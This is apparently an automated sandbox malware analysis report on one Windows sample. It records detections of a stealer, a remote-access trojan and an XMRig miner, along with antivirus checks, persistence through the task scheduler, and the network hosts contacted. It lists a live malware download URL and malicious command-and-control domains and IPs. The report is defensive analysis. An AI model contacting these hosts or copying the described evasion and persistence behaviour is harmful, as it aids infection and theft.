AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Target.exe, 00000001.00000002.4278312501.000001D0B44C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.6.117.16	unknown	United States	20940	AKAMAI-ASN1EU	false
23.11.231.177	unknown	United States	20940	AKAMAI-ASN1EU	false
172.253.124.104	www.google.com	United States	15169	GOOGLEUS	false
131.253.33.200	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
104.208.16.92	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.159.108.190	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.213.41	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.196.10.233	gjhfhgdg.insane.wang	Switzerland	42624	SIMPLECARRIERCH	true
179.43.170.230	starsmm.org	Panama	51852	PLI-ASCH	true
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
172.253.124.132	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
23.0.175.178	unknown	United States	20940	AKAMAI-ASN1EU	false
13.107.21.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.0.175.195	unknown	United States	20940	AKAMAI-ASN1EU	false
23.106.238.238	addons.i7con.net	United Kingdom	7203	LEASEWEB-USA-SFO-12US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.11.231.163	unknown	United States	20940	AKAMAI-ASN1EU	false
23.101.168.44	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
3.163.101.92	unknown	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.16
192.168.2.4
127.0.0.1

Contacted Domains

Name	IP	Active
fg.microsoft.map.fastly.net	199.232.214.172	true
chrome.cloudflare-dns.com	172.64.41.3	true
gjhfhgdg.insane.wang	185.196.10.233	true
addons.i7con.net	23.106.238.238	true
plus.l.google.com	142.250.105.139	true
www.google.com	172.253.124.104	true
starsmm.org	179.43.170.230	true
googlehosted.l.googleusercontent.com	172.253.124.132	true
clients2.googleusercontent.com	unknown	unknown
bzib.nelreports.net	unknown	unknown
xot.traxa41.net	unknown	unknown
ntp.msn.com	unknown	unknown
apis.google.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://assets.msn.com/bundles/v1/edgeChromium/latest/common-segments.11aff16404408a58d3d2.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-app-upsell.b15413e73bafe92e0855.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-banner_index_js-cs-core-desktop_card-components_dis-cef191.888669d9cc0659b01a27.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.65258d4f38c7e7963827.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/pill-wc.87e5c35451d51ad2c9c1.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.ad1f555a047bcac24a4a.js	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/PowerBI_24x.svg	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneDrive_24x.svg	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/waterfall-view-feed.da1860afbfeb79eba90c.js	false		high
https://assets.msn.com/service/v1/news/users/me/locations?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/superBreakingNews.b103d390df46602376d8.js	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Sway_24x.svg	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.3220005356a33ce0ca94.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.119ca1abd9fdaf26e071.js	false		high
https://assets.msn.com/staticsb/statics/latest/common/icons/ZoomWhite.svg	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/RewardsCoachmarkData.c462c3980af18bc60b9d.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/codex-bing-chat.d4705abeab944b647de2.js	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Yammer_24x.svg	false		high
https://sb.scorecardresearch.com/b2?rn=1713906139242&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=09C025F5A71D6FE2180F319FA60A6E8D&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/SunnyDayV3.svg	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_core_dist_interaction-tracker_MouseTracker_js-libs_weather-shared-wc_dist_utilities_entr-072035.11606a415b7b5f44447f.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.5ea7db000698f8928d23.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_channel-page-utils_dist_UrlUtilities_js-libs_feed-layout_dist_Utils_js-libs_river-data-t-5c6710.8c7d0e28efea755d336f.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/conditionalBannerWC.6d8019b2ba4ee047b8c5.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.2a930d83a1ebb2ea4b2d.js	false		high
https://bzib.nelreports.net/api/report?cat=bingbusiness	false	URL Reputation: safe	unknown
https://assets.msn.com/statics/icons/favicon_newtabpage.png	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneNote_24x.svg	false		high
https://assets.msn.com/staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v3v4.5873ec4aa566b5d8efc3.js	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1713906147886&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://c.msn.com/c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=59892F5548B8410F875CC582C027017F&MUID=09C025F5A71D6FE2180F319FA60A6E8D	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.6cd4b923cfe7c0d8b058.js	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/ToDo_24x.svg	false		high
https://c.msn.com/c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.6985524dca6d732452d7.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/common-feed-libs.1f70b20165d70f57b9b6.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.e6fcf9edbaadfb663ccb.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/digest-card.7224d7f5906215f25e3c.js	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-data-connector.02a4c4f575b24365379f.js	false		high
http://185.196.10.233/dll/ghghghgfg.xml	true	Avira URL Cloud: malware	unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Visio_24x.svg	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.9abeb397be7183994289.js	false		high
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Word_24x.svg	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://xot.traxa41.net/ext/analytic?do=init&from=Chrome3	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: zlONcFaXkc.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.196.10.233/dll/ghghghgfg.xml

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: zlONcFaXkc.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.2.Target.exe.1d0abdfaef0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4120488458.000001978E2D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4110650202.0000000140799000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4120488458.000001978E339000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4137105635.000001D0ABDF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4110650202.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

Found strings related to Crypto-Mining

Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: Target.exe, 00000001.00000002.4137105635.000001D0ABDF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.21.0

Source: unknown	HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:50019 version: TLS 1.2

Source: zlONcFaXkc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: zcezeaqsuhi.exe, 00000002.00000000.1717795774.000002A5B9702000.00000002.00000001.01000000.00000008.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2015898421.000002A5BB410000.00000002.00000001.00040000.00000008.sdmp, zcezeaqsuhi.exe.1.dr
Source:	Binary string: mscorlib.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Lwbtkgrhgw.pdb source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: Hider.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WERD304.tmp.dmp.9.dr

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
